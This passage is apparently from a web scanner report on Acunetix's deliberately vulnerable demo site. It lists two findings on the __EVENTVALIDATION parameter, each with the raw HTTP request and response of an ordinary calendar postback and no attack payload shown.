style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1129 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,129 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8496&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBAeN0xNtsIZGRkyL6ZjAPfsVuBV2m9clQnbEmyzls%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLeqvjECwLTp%2BrACAK1zpjCCwK%2Fk8eMBAK%2Fk8eMBAK%2Fk%2FujDQK%2Fk%2FujDQK%2Fk%2B%2FGBgK%2Fk%2B%2FGBgK%2Fk8OvAwK%2Fk8OvAwK%2Fk%2FfCDAK%2Fk%2FfCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd%2BAkCkLqd%2BAkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ%2BKYDAtfZ%2BKYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg%2BoUNAqjg%2BoUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwcA%2FGoydWi0jkSew9P3TPdukbxcbw%3D%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:19:20 GMT Content-Length: 12481
Response Body - size: 12,481 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgCAZwlEMtsIHgJTRBYBBgBAeN0xNtsIZGRkyL6ZjAPfsVuBV2m9clQnbEmyzls=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLeqvjECwLTp+rACAK1zpjCCwK/k8eMBAK/k8eMBAK/k/ujDQK/k/ujDQK/k+/GBgK/k+/GBgK/k8OvAwK/k8OvAwK/k/fCDAK/k/fCDAKQusHrDwKQusHrDwKQuvWOBwKQuvWOBwKQuuklApC66SUCkLqd+AkCkLqd+AkCkLqxnwECkLqxnwECkLqlsgoCkLqlsgoCkLrZ1gMCkLrZ1gMCkLrN7QwCkLrN7QwCkLqh1QkCkLqh1QkCkLrV6QICkLrV6QIC19mUngcC19mUngcC19mINQLX2Yg1AtfZvMgJAtfZvMgJAtfZ0OwCAtfZ0OwCAtfZxIMKAtfZxIMKAtfZ+KYDAtfZ+KYDAtfZ7P0MAtfZ7P0MAtfZgJAEAtfZgJAEAtfZ9PkCAtfZ9PkCAtfZ6JwKAtfZ6JwKAqjg+oUNAqjg+oUNAqjg7tgGAqjg7tgGAqjggv8PAqjggv8PAqjgtpIHAqjgtpIHAqjgqikCqOCqKQKo4N7NCQKo4N7NCQKo4PLgAgKo4PLgAgKo4OaHCgKo4OaHCgKo4NrsCAKo4NrsCAKo4M4DAqjgzgMCjffYqAMCjffYqAMCjffMzwwCjffMzwwCjffg4gUCjffg4gUCjfeUuQ0CjfeUuQ0CjfeI3AYCjfeI3AYCjfe88w8Cjfe88w8CjffQlwcCjffQlwcA/GoydWi0jkSew9P3TPdukbxcbw==" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8460')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8521')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8485')" style="color:Black" title="March 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8486')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8487')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8488')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8489')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8490')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8491')" style="color:Black" title="April 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8492')" style="color:Black" title="April 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8493')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8494')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8495')" style="color:Black" title="April 05">5</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8496')" style="color:White" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8497')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8498')" style="color:Black" title="April 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8499')" style="color:Black" title="April 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8500')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8501')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8502')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8503')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8504')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8505')" style="color:Black" title="April 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8506')" style="color:Black" title="April 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8507')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8508')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8509')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8510')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8511')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8512')" style="color:Black" title="April 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8513')" style="color:Black" title="April 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8514')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8515')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8516')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8517')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8518')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8519')" style="color:Black" title="April 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8520')" style="color:Black" title="April 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8521')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8522')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8523')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8524')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8525')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8526')" style="color:Black" title="May 06">6</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__EVENTVALIDATION
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1181 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,181 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8588&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA%2FhzGedsIHgJTRBYBBgBAeRt9ftsIZGRkax0b%2BFYJXpbZSMIhhQNeEe0BIf0%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLeqYPsBAKqztTQBQKM1crSCAKK%2Bb%2FgBQKK%2Bb%2FgBQKK%2BdOEDQKK%2BdOEDQKK%2BYfsCwKK%2BYfsCwKK%2BbuDAwKK%2BbuDAwK%2Fk%2BfECQK%2Fk%2BfECQK%2Fk5ubAQK%2Fk5ubAQK%2Fk4%2B%2BCgK%2Fk4%2B%2BCgK%2Fk6PVAwK%2Fk6PVAwK%2Fk9fpDAK%2Fk9fpDAK%2Fk8uMBAK%2Fk8uMBAK%2Fk%2F%2BjDQK%2Fk%2F%2BjDQK%2Fk5PGBgK%2Fk5PGBgK%2Fk8evAwK%2Fk8evAwK%2Fk%2FvCDAK%2Fk%2FvCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB%2BAkCkLqB%2BAkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ%2FKYDAtfZ%2FKYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ%2BPkCAtfZ%2BPkCAtfZ7JwKAtfZ7JwKAqjg%2FoUNAqjg%2FoUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCsga9UZWPbk5I%2FuHmCSHy%2BRMQKMD
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:31:33 GMT Content-Length: 12461
Response Body - size: 12,461 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDA/hzGedsIHgJTRBYBBgBAeRt9ftsIZGRkax0b+FYJXpbZSMIhhQNeEe0BIf0=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLeqYPsBAKqztTQBQKM1crSCAKK+b/gBQKK+b/gBQKK+dOEDQKK+dOEDQKK+YfsCwKK+YfsCwKK+buDAwKK+buDAwK/k+fECQK/k+fECQK/k5ubAQK/k5ubAQK/k4++CgK/k4++CgK/k6PVAwK/k6PVAwK/k9fpDAK/k9fpDAK/k8uMBAK/k8uMBAK/k/+jDQK/k/+jDQK/k5PGBgK/k5PGBgK/k8evAwK/k8evAwK/k/vCDAK/k/vCDAKQusXrDwKQusXrDwKQuvmOBwKQuvmOBwKQuu0lApC67SUCkLqB+AkCkLqB+AkCkLq1nwECkLq1nwECkLqpsgoCkLqpsgoCkLrd1gMCkLrd1gMCkLrx7QwCkLrx7QwCkLql1QkCkLql1QkCkLrZ6QICkLrZ6QIC19mYngcC19mYngcC19mMNQLX2Yw1AtfZoMgJAtfZoMgJAtfZ1OwCAtfZ1OwCAtfZyIMKAtfZyIMKAtfZ/KYDAtfZ/KYDAtfZkP0MAtfZkP0MAtfZhJAEAtfZhJAEAtfZ+PkCAtfZ+PkCAtfZ7JwKAtfZ7JwKAqjg/oUNAqjg/oUNAqjgktgGAqjgktgGAqjghv8PAqjghv8PAqjgupIHAqjgupIHAqjgrikCqOCuKQKo4MLNCQKo4MLNCQKo4PbgAgKo4PbgAgKo4OqHCgKo4OqHCsga9UZWPbk5I/uHmCSHy+RMQKMD" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8552')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">July 2023</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8613')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8576')" style="color:Black" title="June 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8577')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8578')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8579')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8580')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8581')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8582')" style="color:Black" title="July 01">1</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8583')" style="color:Black" title="July 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8584')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8585')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8586')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8587')" style="color:Black" title="July 06">6</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8588')" style="color:White" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8589')" style="color:Black" title="July 08">8</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8590')" style="color:Black" title="July 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8591')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8592')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8593')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8594')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8595')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8596')" style="color:Black" title="July 15">15</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8597')" style="color:Black" title="July 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8598')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8599')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8600')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8601')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8602')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8603')" style="color:Black" title="July 22">22</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8604')" style="color:Black" title="July 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8605')" style="color:Black" title="July 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8606')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8607')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8608')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8609')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8610')" style="color:Black" title="July 29">29</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8611')" style="color:Black" title="July 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8612')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8613')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8614')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8615')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8616')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8617')" style="color:Black" title="August 05">5</a></td></tr> </table><BR> <a 